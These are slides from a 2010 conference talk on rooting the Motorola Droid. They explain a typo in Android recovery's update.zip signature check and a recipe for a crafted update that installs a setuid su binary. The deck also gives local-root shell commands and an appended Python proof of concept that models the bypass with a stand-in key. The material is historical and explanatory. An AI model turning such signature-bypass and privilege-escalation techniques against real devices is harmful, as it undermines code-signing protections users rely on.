Eclair’s Creamy Center: How The Droid Was Rooted
Michael Goffin
CarolinaCon 2010

Can you hear me now?
• RIT graduate, 2006
• Computer Science House alumni
• Hack or Halo and ShmooCon staff
• Member of 0x90 and DroidDev

What we’ll cover
• Definitions
• Rooting timeline
• Post-rooting progress
• How to root your phone

Definitions

Droid Definitions
• Droid specs:
  • CDMA dual band (800/1900 MHz); CDMA2000 1xRTT / 1xEV-DO rev. 0 / 1xEV-DO rev. A
  • 3.7-inch 854×480 (16:9 widescreen) capacitive touchscreen
  • 5 megapixel camera with autofocus, LED flash and video recording
  • 600 MHz ARM Cortex-A8 processor (underclocked to 550 MHz)
  • 256 MB RAM / 512 MB ROM
  • 16 GB microSD
  • GPS, Wi-Fi, 3.5 mm headphone jack
  • Talk time: 420 minutes
  • Standby time: 450 hours

Definitions
• AOSP
  • Android Open Source Project
• Odex
  • The Java VM on Android is the Dalvik VM (designed for processor- and memory-constrained devices)
  • It consumes DEX files (Java classes converted by the dx tool)
  • When files are loaded into the VM, their classes are optimized by dexopt
  • The optimization result is an ODEX’d file
• Deodex
  • De-odexing a file so you can hack on the code
  • Done using deodexerant

Why root the Droid?
• Overclocking
• Installing apps which require escalated privileges
• Theming
• Wireless tethering
• Backported apps from other Android devices (Milestone, Nexus One, etc.)
• Control over OTA updates
• Mixing and matching feature sets from different Android versions

Key Dates (all 2009)
• Release of Droid: 11/6
• Finding the official 2.0.1 update.zip: 12/7
• First root: 12/8
• First local root: 12/8
• Simplified rooting process: 12/9
• Custom payload instructions: 12/10
• Official OTA rollout of 2.0.1: 12/11

Where we started
• A small group of us met on www.droidforums.net in early November
• Created a private IRC channel and Google Waves, and reached out to other sites
  • www.alldroid.org
  • forum.xda-developers.com
• Started looking for potential exploits

Where we started
• [mbm] found this gem in the Android source: verifier.c
• This loop is part of the whole-file signature check, which verifies everything from the start of the file to the EOCD (end of central directory) record that marks the end of the update.zip
• The loop is meant to reject a second EOCD marker appearing after the real one. Look at the fourth comparison: it tests eocd[i+1] instead of eocd[i+3], and eocd[i+1] cannot equal both 0x4b and 0x06, so the check can never fire

    for (i = 4; i < eocd_size-3; ++i) {
        if (eocd[i  ] == 0x50 && eocd[i+1] == 0x4b &&
            eocd[i+2] == 0x05 && eocd[i+1] == 0x06) {   /* typo: should be eocd[i+3] */
            // if the sequence $50 $4b $05 $06 appears anywhere after
            // the real one, minzip will find the later (wrong) one,
            // which could be exploitable.  Fail verification if
            // this sequence occurs anywhere after the real one.
            LOGE("EOCD marker occurs after start of EOCD\n");
            fclose(f);
            return VERIFY_FAILURE;
        }
    }

BONUS NUGGET!
• For those interested in the patch that was eventually submitted to Google:
  Commit: https://review.source.android.com/#change,12807
  Diff: https://review.source.android.com/#patch,sidebyside,12807,1,verifier.c

Where we started
• Waiting game for the official update.zip to come out so we could work with it
• [mbm] to the rescue!! He guessed the URL:
  https://android.clients.google.com/updates/voles/signed-voles-ESD56-fromESD20.84263456.zip

Game on
• Zinx Verituse used the official update.zip to craft a custom update.zip using the exploit
• The goal was an update.zip that the phone accepts as a standard, signed update, but which injects an su binary to gain root access

Game on
• Process involves (30k’ view):
  1. Create a non-zip file of all 0’s, the same size as the official update.zip (the donor)
  2. Build a payload zip file
  3. Concatenate the payload to the non-zip file to form your update.zip
  4. Adjust offsets
  5. Append the signature from the donor to the end of your update.zip
  6. For any file you want from the donor, copy out the relevant hex
  7. Use dd to copy those bytes from the donor into your update.zip
• Why it works: the whole-file signature covers the file only up to the EOCD record’s comment-length field; the archive comment (at most 64 KB, and where the signature itself lives) is unsigned. minzip locates the archive by the last EOCD marker in the file, so a second zip placed in that comment area is what actually gets installed, and the loop above was the only thing meant to catch it

Game on
• The detailed process can be found here:
  http://alldroid.org/threads/13908-Crafting-your-own-update-zip-payload
• Zinx wrote Volez to make this easier:
  http://zenthought.org/content/project/volez

First Root Posted
• Zinx posted the first root to www.alldroid.org
  http://alldroid.org/viewtopic.php?f=236&t=567
• The first root process gave us root through an ADB shell
• Required plugging into a computer

First Local Root Posted
• Same day, I posted instructions for getting local root on the phone without the need for a computer
• Goal was to get access for developers to start porting their “root required” apps in the Google Market to the Droid

First Local Root Posted
• Process involves (again, 30k’ view):
  1. Root the Droid using Zinx’ process
  2. Download a special su binary used in previous Android rooted installs
  3. Use ADB to push the su binary to /data/local/ (writable user folder)
  4. Remount /system on the phone as read-write
  5. `mv /system/bin/su /system/bin/osu`
  6. `cat /data/local/su > /system/bin/su`
  7. `chmod 6755 /system/bin/su` (setuid/setgid bits on a root-owned binary, which is what lets an unprivileged caller become root)
  8. Run `sync`, then `reboot`
• End result is being able to execute `su` from a terminal emulator directly on the phone

First Local Root Posted
• Detailed, but outdated, instructions can be found here:
  http://alldroid.org/viewtopic.php?f=210&t=572

Simplified Rooting Process
• An easier process was posted the day after:
  • update.zip was fitted with the special su binary and Superuser.apk from Cyanogen, to manage applications attempting to use escalated privileges

Enter Sholes.info group!
• The original group from IRC, with some other developers from other sites, created www.sholes.info
• Sholes was the codename of the Droid
• Yes, we hosted http://as.sholes.info
• Goal was to start customizing the phone and continue exploit research for when Google patched

Enter Sholes.info group!
• First project released: sprecovery
  • A modified recovery to replace the one currently on the Droid
  • Lets us easily flash custom updates, ROMs, and other changes onto the phone from the SD card
  • Written by SirPsychoS

Enter Sholes.info group!
• Second project: SholesMod
  • Custom ROM installed using sprecovery
  • Custom kernel modifications
  • Ported applications
  • Shell enhancements
  • Developed and tested by all of the SholesMod group

Enter Sholes.info group!
• Third project: SMUpdater
  • App put in the Google Market
  • Automated downloading the latest ROM version onto the SD card and installing it
  • Will install sprecovery, root the phone, and install the ROM
  • Written by Camel
  • Put in the Market for $5 as a donation to the team, but also put on the site for free
  • $25k in 2-3 weeks

Enter Sholes.info group!
• Group continued backporting
• Focus shifted to overclocking
  • Released ROM with 600/800/1000 MHz
  • Configured using the SetCPU app from the Market
• Added AdamZ’s Smoked Glass theme
• Backported 2.1 applications
  • 2.1 is still not officially released as of writing this, but sounds like 3/19

Breaking News!!
[Verizon] spokesperson Thomas Pica said in an email [on 3/18], "The Android 2.1 upgrade for the Droid by Motorola was deployed to a small number of Verizon Wireless test users as scheduled. It is expected the broader phased rollout to all Droid by Motorola users will take place, but not just yet. No date scheduled yet."
http://www.phonescoop.com/news/item.php?n=5676

There Goes Sholes.info group!
• Issues arose within sholes.info, and the site and source were taken down by the server owner
• Luckily we were using Mercurial, so we all had the source
  • Another great reason to use a distributed SCM!
• Group decided to refund everyone their money from purchasing the app and move forward with a free app and a donation-only site

Enter DroidMod group!
• SMUpdater was discontinued
• New site: http://droidmod.org
• New members joined to increase bandwidth and support for the increased demand
• Camel created DMUpdater 1.0
• Group created a new ROM to go out with 1.0
  • More apps backported
• Download from the site only, until we can get it into the Market

Using DroidMod

More on the DroidMod group
• Open IRC channel on freenode: #droidmod
• Moved from Mercurial to git
• Currently working on compiling the 2.6.32 kernel for the Droid
• New DroidMod coming soon!

What others are doing
• Lots of ROMs coming out with custom themes, kernels, apps, etc.
• Overclocking exceeding 1200/1300 MHz
• Koush recently ported CyanogenMod from the Nexus One over to the Droid
• 360-degree rotation

Summary of URLs
AOSP: http://source.android.com/
AOSP Git repo: http://android.git.kernel.org/
Forums:
  http://www.alldroid.org
  http://www.droidforums.net
  http://forum.xda-developers.com
  http://forum.droidmod.org
Committed patch for exploit: https://review.source.android.com/#change,12807
Diff: https://review.source.android.com/#patch,sidebyside,12807,1,verifier.c
Guessed URL for update: https://android.clients.google.com/updates/voles/signed-voles-ESD56-fromESD20.84263456.zip
Creating update.zip: http://alldroid.org/viewtopic.php?f=286&t=626
First root process: http://alldroid.org/viewtopic.php?f=236&t=567
First local root process: http://alldroid.org/viewtopic.php?f=210&t=572

Credit where it’s due
[mbm] - finding the original exploit in the code, and guessing the update URL that made this possible
Zinx Verituse - put together the original update.zip payload and tool, and posted the first rooting
Cyanogen - Superuser.apk
mjxg - local root
SirPsychoS - recovery mod
koush - CyanogenMod ported to Droid
Camel - original SholesMod Updater and new DroidMod Updater

Contributors to DroidMod and the advancement of the Droid hacking community:
[mbm], SirPsychoS, humancyborg, m0nkee, mjxg, Orgg, Randomcity, trevorj, angel12, birdman, Camel, forkup, planb, unicron, votetrev, vulcan, xeudoxus, gandhip, Ronen, visbits, electrofunk, koush, takeda

Thank you
Slides will be available on my website: www.mgoff.in
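Appendix (added with this edit; example code, not the slides’ own and not AOSP’s): the verifier loop from “Where we started” and the crafting recipe from “Game on”, modelled end to end in Python. The RSA signature is replaced by a keyed SHA-1 over the same signed region (the key and the 20-byte RSANUMBYTES are constructed assumptions), the “official” donor zip and the payload zip are built inside the script, and minzip is reduced to the two behaviours that matter here: the last EOCD marker wins and offsets are absolute. `verify(..., fixed_check=False)` reproduces the eocd[i+1] typo, `fixed_check=True` the patched comparison.

```python
# Added example for this deck (not the slides' code and not AOSP's): a model of
# the Eclair recovery whole-file signature check and of the second-EOCD trick
# from the "Game on" recipe.  Assumptions: RSA is replaced by a keyed SHA-1 over
# the same signed region, with a constructed key and RSANUMBYTES shrunk to 20.
import hashlib
import io
import struct
import zipfile

EOCD_MAGIC = b"PK\x05\x06"
FOOTER_LEN = 6                        # (2-byte signature start) $ff $ff (2-byte comment size)
SIG_LEN = 20                          # stand-in for RSANUMBYTES (256 for the real key)
KEY = b"constructed-ota-signing-key"  # assumption: stands in for the OTA RSA private key


def build_zip(files):
    """Stored (uncompressed) zip from {name: bytes}; zipfile writes no comment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()


def sign(zip_bytes):
    """Like signapk: sign [0, EOCD+20), then put signature + 6-byte footer in the comment."""
    eocd = zip_bytes.rfind(EOCD_MAGIC)
    sig = hashlib.sha1(KEY + zip_bytes[:eocd + 20]).digest()
    comment_size = SIG_LEN + FOOTER_LEN
    footer = struct.pack("<H2sH", comment_size, b"\xff\xff", comment_size)
    return zip_bytes[:eocd + 20] + struct.pack("<H", comment_size) + sig + footer


def verify(data, fixed_check):
    """Model of recovery's verify_file(); False keeps the eocd[i+1] typo, True uses eocd[i+3]."""
    sig_start, marker, comment_size = struct.unpack("<H2sH", data[-FOOTER_LEN:])
    if marker != b"\xff\xff" or sig_start - FOOTER_LEN < SIG_LEN:
        return False
    eocd_size = comment_size + 22
    eocd = data[len(data) - eocd_size:]
    if eocd[:4] != EOCD_MAGIC:
        return False
    for i in range(4, eocd_size - 3):  # reject a second EOCD marker after the real one
        fourth = eocd[i + 3] if fixed_check else eocd[i + 1]
        if eocd[i] == 0x50 and eocd[i + 1] == 0x4B and eocd[i + 2] == 0x05 and fourth == 0x06:
            return False               # "EOCD marker occurs after start of EOCD"
    signed = data[:len(data) - eocd_size + 20]  # everything but comment length + comment
    return data[-(FOOTER_LEN + SIG_LEN):-FOOTER_LEN] == hashlib.sha1(KEY + signed).digest()


def shift_offsets(z, delta):
    """Step 4: payload sits delta bytes into the new file; minzip offsets are absolute."""
    out = bytearray(z)
    eocd = len(z) - 22
    count, _, cd_off = struct.unpack_from("<HII", z, eocd + 10)
    pos = cd_off
    for _ in range(count):
        n, m, k = struct.unpack_from("<HHH", z, pos + 28)   # name/extra/comment lengths
        local, = struct.unpack_from("<I", z, pos + 42)      # local header offset
        struct.pack_into("<I", out, pos + 42, local + delta)
        pos += 46 + n + m + k
    struct.pack_into("<I", out, eocd + 16, cd_off + delta)
    return bytes(out)


def craft(donor, payload_files):
    """Steps 1-7: keep the donor's signed bytes + signature, add a second zip in the comment."""
    _, _, comment_size = struct.unpack("<H2sH", donor[-FOOTER_LEN:])
    eocd_pos = len(donor) - comment_size - 22
    signed = donor[:eocd_pos + 20]
    sig = donor[-(FOOTER_LEN + SIG_LEN):-FOOTER_LEN]
    payload = shift_offsets(build_zip(payload_files), len(signed) + 2)
    new_comment = len(payload) + SIG_LEN + FOOTER_LEN
    if new_comment > 0xFFFF:
        raise ValueError("comment length is 16-bit: payload must fit in 64 KiB")
    footer = struct.pack("<H2sH", SIG_LEN + FOOTER_LEN, b"\xff\xff", new_comment)
    return signed + struct.pack("<H", new_comment) + payload + sig + footer


def read_like_minzip(data):
    """Read entries as minzip does: the last EOCD marker wins, offsets are absolute."""
    eocd = data.rfind(EOCD_MAGIC)
    count, _, pos = struct.unpack_from("<HII", data, eocd + 10)
    entries = {}
    for _ in range(count):
        n, m, k = struct.unpack_from("<HHH", data, pos + 28)
        csize, = struct.unpack_from("<I", data, pos + 20)
        off, = struct.unpack_from("<I", data, pos + 42)
        ln, lm = struct.unpack_from("<HH", data, off + 26)  # local header name/extra lengths
        start = off + 30 + ln + lm
        entries[data[pos + 46:pos + 46 + n].decode()] = data[start:start + csize]
        pos += 46 + n + m + k
    return entries


def demo():
    """Constructed 'official' update and constructed payload carrying an su stand-in."""
    donor = sign(build_zip({"boot.img": b"A" * 64, "META-INF/com/google/android/update-script": b"official"}))
    crafted = craft(donor, {"system/bin/su": b"\x7fELF-constructed-su",
                            "META-INF/com/google/android/update-script": b"copy_dir PACKAGE:system SYSTEM:"})
    return {"donor_verifies": verify(donor, True),
            "crafted_passes_buggy_verifier": verify(crafted, False),
            "crafted_passes_fixed_verifier": verify(crafted, True),
            "what_minzip_installs": sorted(read_like_minzip(crafted))}
```

Run `demo()`: the donor verifies under either check, the crafted file passes the buggy check and is rejected by the patched one (the payload’s own EOCD marker now sits inside the scanned comment region), and `read_like_minzip` on the crafted file lists the payload’s entries rather than the donor’s. The 64 KiB cap in `craft` is why the real recipe reused donor files by copying their hex rather than re-embedding them.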